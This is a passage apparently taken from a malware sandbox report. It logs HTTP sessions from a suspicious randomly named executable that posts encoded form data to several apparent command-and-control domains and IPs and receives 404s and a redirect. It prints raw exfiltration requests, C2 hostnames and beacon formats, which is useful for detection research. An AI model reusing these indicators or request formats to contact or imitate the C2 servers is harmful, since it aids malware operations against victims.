63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49999	103.71.154.12	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:40.120219946 CET	713	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 61 36 50 6b 6a 56 75 6f 70 66 2b 45 48 51 62 50 78 70 6b 47 73 42 45 51 31 4a 47 6c 48 2f 47 76 44 47 69 52 66 47 63 31 35 35 6c 44 33 2b 54 4b 52 58 45 78 75 78 37 7a 32 66 38 72 4f 50 4d 4a 73 6b 6a 30 58 6f 54 49 63 48 31 73 31 46 30 33 5a 66 58 61 63 56 43 32 54 73 74 56 72 4c 5a 2f 32 64 65 6e 34 47 72 4c 47 43 77 75 38 38 38 4a 4d 6d 57 62 41 4c 71 68 4f 76 73 58 65 4a 68 73 64 39 34 63 62 58 34 5a 68 73 58 6d 76 52 2f 2f 75 61 4e 70 71 6a 6a 31 36 39 44 35 54 4d 42 4c 77 50 7a 41 50 7a 54 66 6e 6a 43 33 31 51 42 45 61 69 4b 62 6d 61 30 38 4d 6d 73 3d Data Ascii: 1Zgl=WcC2F+nzEW5Oa6PkjVuopf+EHQbPxpkGsBEQ1JGlH/GvDGiRfGc155lD3+TKRXExux7z2f8rOPMJskj0XoTIcH1s1F03ZfXacVC2TstVrLZ/2den4GrLGCwu888JMmWbALqhOvsXeJhsd94cbX4ZhsXmvR//uaNpqjj169D5TMBLwPzAPzTfnjC31QBEaiKbma08Mms=
Oct 31, 2024 10:26:41.066744089 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 31 Oct 2024 09:26:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50000	103.71.154.12	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:42.658293009 CET	733	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4b 32 76 44 6e 53 52 65 48 63 31 77 70 6c 44 34 75 54 4c 4f 6e 45 71 75 78 6d 41 32 64 34 72 4f 4c 6b 4a 73 6c 54 30 57 66 6e 4a 63 58 31 75 75 31 30 31 48 76 58 61 63 56 43 32 54 73 34 34 72 4c 52 2f 31 75 47 6e 35 6b 53 35 46 43 77 68 2f 38 38 4a 49 6d 57 41 41 4c 71 35 4f 74 49 39 65 4d 6c 73 64 34 38 63 62 43 59 61 32 63 58 38 78 68 2f 72 6a 36 74 67 6e 54 79 34 6d 65 32 34 46 71 5a 55 31 35 43 71 56 52 62 33 30 44 75 50 6c 44 4a 7a 4c 53 72 79 38 35 6b 4d 53 78 35 77 72 41 74 70 42 32 2f 38 50 41 33 75 70 72 49 78 32 7a 2b 55 Data Ascii: 1Zgl=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HK2vDnSReHc1wplD4uTLOnEquxmA2d4rOLkJslT0WfnJcX1uu101HvXacVC2Ts44rLR/1uGn5kS5FCwh/88JImWAALq5OtI9eMlsd48cbCYa2cX8xh/rj6tgnTy4me24FqZU15CqVRb30DuPlDJzLSry85kMSx5wrAtpB2/8PA3uprIx2z+U
Oct 31, 2024 10:26:43.598071098 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 31 Oct 2024 09:26:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50001	103.71.154.12	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:45.207139015 CET	1750	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4c 69 76 44 78 75 52 65 67 49 31 69 35 6c 44 2b 65 54 47 4f 6e 45 72 75 78 76 6f 32 64 30 56 4f 4e 67 4a 74 47 4c 30 48 62 37 4a 58 58 31 75 78 46 30 30 5a 66 58 50 63 56 53 79 54 73 6f 34 72 4c 52 2f 31 76 32 6e 2b 32 71 35 44 43 77 75 38 38 38 4e 4d 6d 58 4f 41 4c 79 44 4f 74 4d 48 65 34 52 73 61 59 73 63 64 32 34 61 71 4d 58 36 77 68 2b 73 6a 36 67 34 6e 54 76 4c 6d 66 43 43 46 74 31 55 30 66 58 77 46 69 32 75 32 44 32 37 6e 44 42 72 65 32 6a 31 39 66 59 45 50 78 6c 41 6e 67 77 48 49 48 76 44 4b 54 79 68 37 65 34 44 6e 46 65 56 68 45 73 4b 6e 4e 73 2b 37 52 76 76 2f 62 55 37 6e 79 66 52 50 32 38 73 70 70 47 63 33 45 6b 4f 77 64 79 6d 63 2f 69 6c 75 72 49 33 34 74 47 62 7a 38 56 35 6e 72 6a 72 4c 45 76 49 4f 35 45 6c 52 2f 33 78 33 4e 46 38 32 6c 43 35 73 55 77 4e 6b 38 79 79 31 6e 34 66 4b 79 33 32 64 51 5a 6a 39 67 63 64 6e 6a 4f 33 42 52 62 52 30 6e 57 56 58 [TRUNCATED] Data Ascii: 1Zgl=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HLivDxuRegI1i5lD+eTGOnEruxvo2d0VONgJtGL0Hb7JXX1uxF00ZfXPcVSyTso4rLR/1v2n+2q5DCwu888NMmXOALyDOtMHe4RsaYscd24aqMX6wh+sj6g4nTvLmfCCFt1U0fXwFi2u2D27nDBre2j19fYEPxlAngwHIHvDKTyh7e4DnFeVhEsKnNs+7Rvv/bU7nyfRP28sppGc3EkOwdymc/ilurI34tGbz8V5nrjrLEvIO5ElR/3x3NF82lC5sUwNk8yy1n4fKy32dQZj9gcdnjO3BRbR0nWVXclxNfGtO1SXk8LpGRh19bVdSfVFi9UfkjuA93lUMLFJeWM0INmRz3hY+9RerQELj9+9yH3cY2UeAzsn6JiHNFfR6CAEDeEO//Zcyv3ul8Fz/82QX3SHU+3Ca/mWBb9bwh0iPcVaZIkEgRXWpS+4m1Zd3Tl6l+cu9aiYO4fxv4DvQt83+WJwWDVb8+8cicyf0Ph6W1V8ZCMEuYRMq6I20emce6mqRCmgT3n6uia/mBOBDWl2+xNZxIzPsk94pP9EmPfRNtYBc6ohPTYaRFEWeSpGj11gFzZmWErbc4FjANzi6UmJJCnF6BBNh5M949fc1ijg6rxJpntzTmbDEq5K6/l0B4adu6w/dwOupJt5zHTD6MDcsV6D1nito+A0UxGDKCvGFppw9z3gXBQ2oVOS/mZyEuyVf4jASNxx8cYlh0SHeuYb91dz/zhtOXBD7jD8u2QDrNe+gFMeYj0xrgp3eIsunBWvkOYXsAVxJAHLl48p9EqQquIXfJOO+xEtVat2ynDVqqoAwn08Tdhnv5HyQLn58/ZmNcoiPHQjWnLKtTbBV/VcVm9Vwf0TIMEwofENe/jfPjHe8ynzGqsJ/z6sDaXyamrCDxB4CWfNCaFu+sm0NAnl9KfbRsyx+TNyUXFzgyhfHk1BqCNxz1tuxhaJ+loHGBbUFrE9mkR [TRUNCATED]
Oct 31, 2024 10:26:46.148559093 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 31 Oct 2024 09:26:46 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50002	103.71.154.12	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:47.751538038 CET	456	OUT	GET /jx6k/?1Zgl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.2925588.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:26:48.690690994 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 31 Oct 2024 09:26:48 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50003	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:53.937131882 CET	713	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 36 6f 64 75 51 70 32 4f 52 73 68 4e 38 50 47 6e 6f 45 70 46 38 53 77 6e 6b 6d 4d 62 2f 69 34 53 6a 56 6d 39 6e 75 63 47 67 61 32 76 2b 32 62 4a 71 2f 65 6d 37 33 72 70 4c 38 50 6a 39 50 4b 53 51 6b 45 37 76 6b 67 4f 5a 51 46 6c 7a 4d 48 31 6d 2b 45 64 63 5a 59 6c 69 48 33 74 65 59 38 35 53 43 4a 5a 53 48 75 79 37 36 7a 6b 31 38 50 72 39 65 78 34 71 57 32 55 43 53 43 43 48 2f 32 35 4d 51 4b 43 79 71 39 4b 57 58 75 6e 4c 62 4a 56 75 63 36 6a 31 63 73 74 51 55 38 75 72 5a 43 41 76 6e 6d 76 70 44 46 5a 70 45 72 74 2f 7a 61 52 47 58 41 64 62 31 34 6b 6e 34 49 3d Data Ascii: 1Zgl=8FrukiibSUwX6oduQp2ORshN8PGnoEpF8SwnkmMb/i4SjVm9nucGga2v+2bJq/em73rpL8Pj9PKSQkE7vkgOZQFlzMH1m+EdcZYliH3teY85SCJZSHuy76zk18Pr9ex4qW2UCSCCH/25MQKCyq9KWXunLbJVuc6j1cstQU8urZCAvnmvpDFZpErt/zaRGXAdb14kn4I=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50004	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:56.489922047 CET	733	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 4d 53 6a 33 75 39 31 2f 63 47 6a 61 32 76 6d 47 62 47 6c 66 65 78 37 33 6e 68 4c 35 33 6a 39 50 4f 53 51 6e 51 37 6f 58 49 4a 61 67 46 37 6d 63 47 54 70 65 45 64 63 5a 59 6c 69 44 6d 41 65 59 6b 35 53 54 35 5a 55 6d 75 74 79 61 7a 6e 79 38 50 72 33 4f 78 38 71 57 32 6d 43 54 66 5a 48 39 4f 35 4d 51 36 43 79 2b 52 46 63 58 75 68 47 37 49 6e 71 39 6e 72 36 75 34 43 53 48 49 70 33 36 61 39 6a 78 58 46 7a 68 4e 78 36 6b 48 56 76 67 53 6d 58 6e 68 30 42 57 6f 55 35 76 65 5a 34 6d 6a 56 67 65 38 53 6e 6f 52 6c 34 64 46 50 63 65 61 41 Data Ascii: 1Zgl=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QMSj3u91/cGja2vmGbGlfex73nhL53j9POSQnQ7oXIJagF7mcGTpeEdcZYliDmAeYk5ST5ZUmutyazny8Pr3Ox8qW2mCTfZH9O5MQ6Cy+RFcXuhG7Inq9nr6u4CSHIp36a9jxXFzhNx6kHVvgSmXnh0BWoU5veZ4mjVge8SnoRl4dFPceaA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50005	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:26:59.036293983 CET	1750	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 55 53 67 46 57 39 6e 4d 30 47 69 61 32 76 34 32 62 46 6c 66 65 73 37 33 76 6c 4c 34 4b 65 39 4e 47 53 54 46 49 37 74 6d 49 4a 4e 77 46 37 2b 73 47 48 6d 2b 45 49 63 61 68 75 69 48 36 41 65 59 6b 35 53 52 68 5a 58 33 75 74 2b 36 7a 6b 31 38 50 4f 39 65 78 45 71 57 75 32 43 54 62 4a 45 4f 47 35 4d 77 71 43 2b 74 70 46 51 58 75 6a 46 37 49 2f 71 39 72 6b 36 75 30 6b 53 47 39 38 33 36 69 39 68 77 4f 53 6d 44 64 78 70 55 72 56 73 33 57 6e 57 68 34 5a 47 67 78 6c 2b 38 6e 37 78 31 37 4d 6c 65 45 72 6e 37 34 43 6d 6f 31 6e 54 4c 37 54 70 32 6e 4e 64 4e 2b 42 71 7a 63 63 32 77 6b 54 77 6f 72 65 4a 35 42 50 49 36 78 68 54 73 50 79 52 6d 35 74 6a 35 45 72 43 43 42 2f 6a 62 54 4a 44 76 71 41 2f 36 51 4b 4b 76 4e 31 33 71 78 4f 75 78 6a 6e 59 4d 4e 37 67 33 5a 41 5a 76 43 47 72 57 51 64 4d 5a 4a 38 72 65 69 6c 4d 2f 58 72 35 44 69 56 2f 70 4d 4f 76 46 57 47 71 41 79 7a 58 [TRUNCATED] Data Ascii: 1Zgl=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QUSgFW9nM0Gia2v42bFlfes73vlL4Ke9NGSTFI7tmIJNwF7+sGHm+EIcahuiH6AeYk5SRhZX3ut+6zk18PO9exEqWu2CTbJEOG5MwqC+tpFQXujF7I/q9rk6u0kSG9836i9hwOSmDdxpUrVs3WnWh4ZGgxl+8n7x17MleErn74Cmo1nTL7Tp2nNdN+Bqzcc2wkTworeJ5BPI6xhTsPyRm5tj5ErCCB/jbTJDvqA/6QKKvN13qxOuxjnYMN7g3ZAZvCGrWQdMZJ8reilM/Xr5DiV/pMOvFWGqAyzXFztcNK50YqCXl6ziYY2ijIJHDzjbNz8heZTB8pLOwr8ezY10/vxgJBSQM1bdsltPCk1SjDwOfoBimQOFtPDPvus/L4vmM/kXTmuw8iYV62CeOEMAdUZ7+hrUGBfVuO/XEHu+7NY9+G8DLLquL6AyM53ag4UnF6yj1Wv9jCXzCcAZivvpcA736Mi31L9coFzskLg8GEeB4m5GilG3Ij9fzbtIi5eiGMvSZvx3AQ5xmUyuRBQpa7ioo8MGiHBsJGpLwYDYgkoYVmt++rEFGQ/B6E/yre86X400JEVquAc1F+hOR6UcFCNkF/+HKZ+6YoF9Yu/4q332fU2hia226h1rafC7W4ILFcX01Xy4ifdyDszi4zytkBz8mYQvWMdTLgWXIEcTLK1u4hAOpDarKR6c54WIOBhMeEJmFfd++s6Otxc+IJId0RcePD/K7jnFBJwXipNZBjWr/CJ71iHSEs6LeH//QUzzqnWdMyurZxsa497Bf4d+t4UEP0RLU0F/bNFGLUXKRlqZdWIWGXToM9flWA/woDyqDvLGLIsvT4FRjqYXcOZsnUhldnhTBEzoR6QXhVd6k1ScoAPRomYDLE9RaHLF+1xbSVlKDoiSZ1VH7UwIouN82bjKZCbpjJZ+YMFs8BFz4kNa73oNYgw1lGZkWAX2jCpmFK5kOr [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50006	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:01.837593079 CET	456	OUT	GET /6o8s/?1Zgl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.wrl-llc.net User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:27:05.381896019 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 31 Oct 2024 09:27:05 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 67 6c 3d 78 48 44 4f 6e 58 2b 6c 57 6c 49 45 72 34 68 70 4a 61 37 76 4a 2b 41 69 30 65 7a 74 6a 69 5a 35 38 47 38 42 37 44 49 64 38 54 4d 2f 71 6e 65 50 79 4e 52 58 38 2b 33 69 36 32 61 56 72 39 76 64 6f 47 6e 4b 4d 59 48 6a 39 62 61 4a 56 46 51 30 70 6d 51 66 4a 53 4e 6a 7a 4b 50 44 74 38 68 63 66 6f 5a 6a 6a 6a 54 75 58 50 38 36 44 78 34 64 52 6e 57 52 30 59 47 2b 76 74 4f 69 6d 75 30 50 72 41 3d 3d 26 77 36 3d 32 76 64 50 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1Zgl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA==&w6=2vdPP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50007	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:10.425013065 CET	710	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 59 7a 43 47 33 72 78 4a 47 66 36 36 66 77 4e 74 43 71 56 65 69 50 63 55 76 4b 57 48 51 2b 5a 4a 4c 2b 6a 69 77 37 54 50 4b 45 64 4d 47 74 7a 5a 51 68 74 53 44 47 33 54 36 57 49 46 68 64 7a 36 67 41 36 50 78 7a 4a 43 59 71 67 48 35 37 66 73 44 67 7a 77 59 4e 66 56 53 55 4c 32 7a 57 74 6b 34 78 52 79 69 78 78 52 63 42 59 50 35 43 4a 75 7a 68 4b 62 46 55 78 6e 76 42 34 48 4f 73 71 65 55 63 55 6a 52 71 64 61 76 38 4e 38 79 6c 79 2f 44 53 54 77 4f 72 36 55 6e 2b 2b 35 33 6c 5a 62 72 76 59 6b 55 6a 64 6e 57 4d 4e 38 33 78 54 6b 56 58 53 77 55 66 65 53 34 54 6f 3d Data Ascii: 1Zgl=n8m4awvF6TmxYzCG3rxJGf66fwNtCqVeiPcUvKWHQ+ZJL+jiw7TPKEdMGtzZQhtSDG3T6WIFhdz6gA6PxzJCYqgH57fsDgzwYNfVSUL2zWtk4xRyixxRcBYP5CJuzhKbFUxnvB4HOsqeUcUjRqdav8N8yly/DSTwOr6Un++53lZbrvYkUjdnWMN83xTkVXSwUfeS4To=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50008	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
